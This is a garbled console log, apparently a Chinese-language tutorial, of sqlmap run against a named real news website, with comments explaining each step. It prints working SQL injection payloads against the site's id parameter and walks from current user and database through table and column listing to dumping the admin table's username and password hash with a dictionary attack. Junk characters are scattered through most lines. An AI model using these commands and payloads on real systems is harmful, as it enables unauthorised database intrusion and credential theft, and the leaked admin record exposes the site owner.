D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
, B$ @3 J8 N3 Ums "Mysql" --current-user /* 注解:获取当前用户名称
3 I, K7 i7 S% \7 Y4 I9 a* f) T sqlmap/0.9 - automatic SQL injection and database takeover tool' f) Q1 z, j/ `0 [
http://sqlmap.sourceforge.net starting at: 16:53:54
" Q& c4 d' e; j' q) U7 W0 O2 A/ h[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as8 V9 b4 K! m- u0 c) g+ m
session file
) \2 ~ x4 d: I3 _: m1 A[16:53:54] [INFO] resuming injection data from session file4 x* H! P2 U/ W
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file5 N& g% V; H B7 y- j# |
[16:53:54] [INFO] testing connection to the target url8 V6 M9 u7 V) B4 |1 m8 l$ K
sqlmap identified the following injection points with a total of 0 HTTP(s) reque, }0 F5 T9 R. ]/ w8 H2 f9 m* Z
sts:
' S, t+ D7 v5 _1 t, H( o+ q---
7 ~4 m$ H7 ^6 T) {$ w1 KPlace: GET
* {9 k' j7 V2 s1 e6 F6 h- aParameter: id
* B @+ ~' z9 A1 y0 ? Type: boolean-based blind
" S6 u2 }" W' k( q Title: AND boolean-based blind - WHERE or HAVING clause
& a5 p* \1 d) A Payload: id=276 AND 799=799
& _. }8 g, M% b3 b: k+ t Type: error-based" U/ @2 ^- |% K! x$ p5 u
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 G S, X: c' N6 p
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; B; @' m$ l/ x5 S2 @4 u `" N
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
5 c$ m p" ?/ b- Z),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
7 A2 v9 d' z2 A1 [ Type: UNION query- N- B8 c8 z5 t A
Title: MySQL UNION query (NULL) - 1 to 10 columns
1 J) [: G8 J& k7 N% b( R Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
& _. n, m: {0 ]0 D( z(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
+ T9 W; U" A8 |2 @! }CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
8 B; E& r& O b( q6 p Type: AND/OR time-based blind
3 n9 n7 r, ?4 E: J( m: C' j Title: MySQL > 5.0.11 AND time-based blind4 W# w! z" I( h
Payload: id=276 AND SLEEP(5)# ?* {- D: L/ T) q0 \. |1 d' N- e
---
/ I, y5 K% ~: p) L2 Y5 z$ R; }[16:53:55] [INFO] the back-end DBMS is MySQL
8 K, \4 r, Y- |8 ?: x/ K6 v# ^web server operating system: Windows2 F# k$ [- G- H, G9 b+ S
web application technology: Apache 2.2.11, PHP 5.3.0
! Q- G U. U! ^0 }0 ?back-end DBMS: MySQL 5.0
/ E/ {9 j# h; ]' J[16:53:55] [INFO] fetching current user& l" Z* g& T. Y/ j2 n; b) Z. t
current user: 'root@localhost'
( q. ~; l+ X# Z( O7 c[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
& L' g+ r. U" l; l7 B- ^tput\www.wepost.com.hk' shutting down at: 16:53:58
B4 _& G5 q7 L6 D$ J. ?$ V0 e' r9 k5 z: o
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 g! _( J+ l9 ~5 K2 ]9 z
ms "Mysql" --current-db /*当前数据库: W9 X" [# i6 p
sqlmap/0.9 - automatic SQL injection and database takeover tool. `5 H u% |. ~- d3 L) e7 c
http://sqlmap.sourceforge.net starting at: 16:54:16
& Q; S/ y2 d* Q2 f9 I& ^2 I/ p9 P5 g[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as: J( P& y" d) K3 q6 e ` T
session file
2 k( A' l5 _6 c0 V[16:54:16] [INFO] resuming injection data from session file8 D- e2 [' K' z
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
) @8 u! S- J7 G/ j[16:54:16] [INFO] testing connection to the target url
* S5 |# [1 F# p. F( ~sqlmap identified the following injection points with a total of 0 HTTP(s) reque0 b. b3 n1 ]& Z7 V. q$ F9 e7 C
sts:9 M S" k. S! v C R4 M r- H
---4 S" Z" a5 j. ?8 u8 U
Place: GET
; j! }% \6 o- i6 V4 K: d. }Parameter: id
* z D+ b# S; _3 D Type: boolean-based blind
! F, I1 I' y' P; z" y Title: AND boolean-based blind - WHERE or HAVING clause
3 ^1 _! o9 ~! Z* M Payload: id=276 AND 799=799
: b( H9 b' ?5 Z* u4 H Type: error-based
: c1 r N) ~& s/ z Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
* r# W* f5 E) b. a# B Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
9 }$ q& p3 v. D3 Y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
6 y% E1 u+ F0 u( \ Q( d w5 S0 K9 c),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
3 V1 C, | y/ [9 F) c Type: UNION query$ } D. U# Z6 B5 O* T
Title: MySQL UNION query (NULL) - 1 to 10 columns
, |* n! e* t) m. h( m- F Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
- u, A! J' @! u% }* e7 T0 E! x(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
4 P! H. J! X& a' t# p; lCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; I! ?) Y- x; C7 e+ g: p# p Type: AND/OR time-based blind5 E1 j3 q, P7 |5 p5 D8 i2 }: @
Title: MySQL > 5.0.11 AND time-based blind5 F* I* J6 g& N
Payload: id=276 AND SLEEP(5)
! T9 x1 G& \% Z j---
4 `# C- C* x, ^[16:54:17] [INFO] the back-end DBMS is MySQL
% C0 L, ^( M- Gweb server operating system: Windows1 p% w; {% c( \# H9 w& @! k. M; K
web application technology: Apache 2.2.11, PHP 5.3.04 w C; F: d+ R
back-end DBMS: MySQL 5.0
1 `1 `% A; o. g[16:54:17] [INFO] fetching current database
- _# M* C1 ]" n0 b/ R. ~+ Pcurrent database: 'wepost'
i" W- e( {" o[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou4 p+ d! u# y+ ~" ~; H( l! I% m: H
tput\www.wepost.com.hk' shutting down at: 16:54:183 G. R" K7 E' v- U( \6 v2 M
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
$ n! |) s+ A- h" ^, N( {9 Nms "Mysql" --tables -D "wepost" /*获取当前数据库的表名+ [( l; i9 }( B/ R& J Z4 X, _
sqlmap/0.9 - automatic SQL injection and database takeover tool+ B4 W! S9 Q: L& ^8 }" D- `
http://sqlmap.sourceforge.net starting at: 16:55:25
6 \- _. o( ~ y: w- B' H; F7 }, @[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
: J0 O% }, N9 o' V2 _6 Q session file' I! {2 _4 ?, Y! W: u
[16:55:25] [INFO] resuming injection data from session file
1 a: c4 X- r' e9 Q[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file- z& f' g; |8 l0 S* ?
[16:55:25] [INFO] testing connection to the target url5 K6 [" K+ H5 V0 Q
sqlmap identified the following injection points with a total of 0 HTTP(s) reque( }- z: x9 ~7 w/ I6 h+ ^
sts:& z8 P, o/ e+ o) W s! C
---4 c8 Y6 R* n+ [! s a8 s
Place: GET
- r! F$ T, ^& u) v6 DParameter: id& v! p1 `$ T$ B
Type: boolean-based blind1 K" s! d2 I1 J! S- f6 i
Title: AND boolean-based blind - WHERE or HAVING clause
; Y& ~: O) L" V# o, x Payload: id=276 AND 799=799
- h8 e+ q; u% {, g C4 w5 r5 } Type: error-based. c+ V0 K2 H9 q4 x
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- b' X. ^, C! f+ N; P/ G Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
7 l& G/ o2 _; f6 v+ t120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
7 S+ x, O+ A* K: }5 u),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
7 v1 [! z2 t: q3 l( v5 L$ s Type: UNION query$ y' Q- W# b% m" T1 A* K
Title: MySQL UNION query (NULL) - 1 to 10 columns
`) ]1 D% i( R( Y7 k Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
0 u/ B& v8 `- u(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
2 G# C4 U. H& r2 W% q2 {& y% Q6 C; QCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; L- q0 z4 U" A! i
Type: AND/OR time-based blind1 U: ?8 i; ^; _- A) Z, J5 _
Title: MySQL > 5.0.11 AND time-based blind
* q' c! C! } P0 [6 G* e4 \ Payload: id=276 AND SLEEP(5)
0 m5 E, y8 r. p! T3 Z---0 D2 C$ V$ m1 T5 p3 J8 e9 q @
[16:55:26] [INFO] the back-end DBMS is MySQL
* q$ {( \; b; L2 e- @web server operating system: Windows% Y, L S! c* ?7 F7 B3 ?) ~; d
web application technology: Apache 2.2.11, PHP 5.3.0
+ U. { [9 f7 [ @6 x' ~$ G* [back-end DBMS: MySQL 5.0
( u# u5 o" E0 E" d[16:55:26] [INFO] fetching tables for database 'wepost'
' t* L' {9 r- G6 h4 I4 H0 v+ T2 T[16:55:27] [INFO] the SQL query used returns 6 entries' v3 J5 u2 M8 n" T) T
Database: wepost7 f& O0 i0 X- J( T4 O
[6 tables]
1 O2 p. o$ A" A# w+-------------+
" ^5 l9 J* h! t6 P| admin |7 E* }6 W0 j) C- W# ]) i% I
| article |: G2 {- r& v' s8 j; e
| contributor |
7 {- `3 ]6 x- Y| idea | @( _, R2 W% S$ l# A% L
| image |" o1 g3 @4 N0 S A/ k! C
| issue |/ `3 {9 t0 T0 c$ N
+-------------+7 u3 C& c# D7 v
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou9 L5 p: l1 i/ ~3 y
tput\www.wepost.com.hk' shutting down at: 16:55:33. J% d/ b6 x4 j) C# @ |
& G9 w* x8 H7 B1 B" s% I6 p9 x9 N" YD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
& h; z; N" E% k8 ^# l" Ims "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名: m7 c7 W. b% U" A" }( l- i* b0 c
sqlmap/0.9 - automatic SQL injection and database takeover tool9 R; ?( b% M M$ q) A$ l6 w
http://sqlmap.sourceforge.net starting at: 16:56:06
. n2 `0 A) g. P) M. jsqlmap identified the following injection points with a total of 0 HTTP(s) reque0 d/ ?+ ]7 K& j9 O( t
sts:
b" X; D& ~6 i9 a2 Y& P1 N9 n# N---- d B8 T' J/ Y" k. L v& H4 o
Place: GET
$ n: Y$ B( S4 G$ fParameter: id, q' Q5 ^( [. u8 H4 q. G
Type: boolean-based blind
. _; I9 N8 n5 e, P3 c6 _, W) J, k Title: AND boolean-based blind - WHERE or HAVING clause' b2 b% d _+ M, u; {% n+ O" A
Payload: id=276 AND 799=799
& i2 W' Y( c+ B d" o1 N Type: error-based
7 j' u2 X% w4 c) f- ? Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, [3 {+ p0 ?6 o# k* R: `
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,2 W( _6 t7 _! ~3 B d: {- b8 q
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,583 }" E' n$ n" Y+ C8 _: ~! w6 |
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
2 S. V0 `! F% D5 A4 G/ ^1 l% \ Type: UNION query* u5 n7 c$ r! T S5 }
Title: MySQL UNION query (NULL) - 1 to 10 columns# W* P3 D0 r3 B# c
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
: L2 A& }3 k7 G, r" h6 G5 a/ m7 x(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),% _" K" n: D o/ `$ i8 ~
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL## Q, E; n8 |4 |; `
Type: AND/OR time-based blind X R% o5 i, X) B6 b& N* B
Title: MySQL > 5.0.11 AND time-based blind( U M% x4 a# U c: R2 ~
Payload: id=276 AND SLEEP(5)4 i4 S* h' U6 @5 H) A6 H/ }% o. W
---: N" r% ~1 x" r% ?
web server operating system: Windows/ ?5 T* D1 @ B* O) g8 M
web application technology: Apache 2.2.11, PHP 5.3.0
( _: y5 e! S. |& w% tback-end DBMS: MySQL 5.0
; e- K# r. o2 K( q6 E; q K[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se/ Y% F4 G6 _+ a! @% x$ d" Q1 o
ssion': wepost, wepost
( r U4 W6 E# FDatabase: wepost# ]5 r) H+ E- z) m' ]: u
Table: admin4 N% i" E4 k; B5 ~8 e; ^5 e3 [
[4 columns]& P( h& m' @( d |% H! E+ J4 s
+----------+-------------+
. f9 i% _8 Z, {5 c" i7 B+ _| Column | Type |2 e1 L) y' L' m) O" t- @
+----------+-------------+. T! r% w& |) T r8 ~, Y: c2 J
| id | int(11) |
8 |1 q1 S- \2 f: H# ~+ ^| password | varchar(32) |
+ F( [0 D+ [( b4 V+ S| type | varchar(10) |& v) b# `& e( B& ^" `' O! X7 _
| userid | varchar(20) |5 a, D3 W# l) B8 }1 E; a( o G
+----------+-------------+# ?: P* o& q" e/ t8 z1 P0 i
shutting down at: 16:56:196 ?6 R: ?$ B3 X' v
k% n2 ?, t4 p" b& M; ^) nD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db5 t+ j; H8 v, a1 W) j
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容' ]) w8 l4 } a
sqlmap/0.9 - automatic SQL injection and database takeover tool/ D& b: a+ v1 o+ ~$ k/ ~# E# G" |
http://sqlmap.sourceforge.net starting at: 16:57:14
: s3 S: G, D( msqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ y) n, c) D9 q% Z4 |. @0 t" }; qsts:2 Z- W# h% _8 _0 h9 s. b
---
3 Y( _ Z% b/ `6 d% xPlace: GET
% `$ O6 C# j/ [9 ~& K) OParameter: id' \4 {; E6 F3 x, G8 ^5 H" l. y& Q
Type: boolean-based blind
& [% ] G5 [! t& R n& Z+ z Title: AND boolean-based blind - WHERE or HAVING clause
+ o8 l/ |- U$ D& A4 G Payload: id=276 AND 799=799
0 z5 G ^4 D3 |+ T' L' i Type: error-based+ Q6 Z' T b% ~$ R
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
; W; L, {* Q* E6 ~$ t6 [ i Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, r( a& Y( p# v x* _* i
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
" J4 T& q( g' `7 R3 I. M6 n),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) c m' N4 ]$ n ]8 x2 }
Type: UNION query: H! a# ?2 S4 k2 K. l5 H
Title: MySQL UNION query (NULL) - 1 to 10 columns
+ y$ T4 H7 U+ O' F% u2 `, s' Z Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR" Q. {) R2 c) b6 \7 A; a$ Y2 x1 h( C
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
, A8 L) p$ J) ~1 h9 hCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 F6 _* X9 A9 z' c
Type: AND/OR time-based blind
) R% ^+ H+ }" [) r3 K1 V* J, r Title: MySQL > 5.0.11 AND time-based blind2 L/ R1 Y U# ?
Payload: id=276 AND SLEEP(5)
' q9 v! \% x D--- o' d) G o" k
web server operating system: Windows1 s+ B' C2 E) m% w
web application technology: Apache 2.2.11, PHP 5.3.0
4 L% f; q+ B1 _: g2 C* _5 s, Oback-end DBMS: MySQL 5.0
% P4 m \9 r' r5 b$ Irecognized possible password hash values. do you want to use dictionary attack o$ O6 \& r* L) T( l( T
n retrieved table items? [Y/n/q] y
5 E1 c% N+ H* qwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
, ^3 a) n2 p* Y* Y* ?do you want to use common password suffixes? (slow!) [y/N] y6 b- z+ j, X1 k U6 J& ~/ j
Database: wepost, z& e& c. l' D1 q
Table: admin% Q. S3 L2 S: `2 _. E
[1 entry], s3 _# N( e9 L
+----------------------------------+------------+
! g; `+ |# @ X8 I: p| password | userid |7 w$ H* J8 w0 c6 P
+----------------------------------+------------+6 ?4 v; `, T! Q7 z" E1 W
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
/ Z ~7 k: ^/ _4 M+----------------------------------+------------+! O. @# v6 ?0 @* | _+ b. _
shutting down at: 16:58:14+ o7 P) \9 f. q) v
. R! a: d0 V/ Y" } [
D:\Python27\sqlmap> |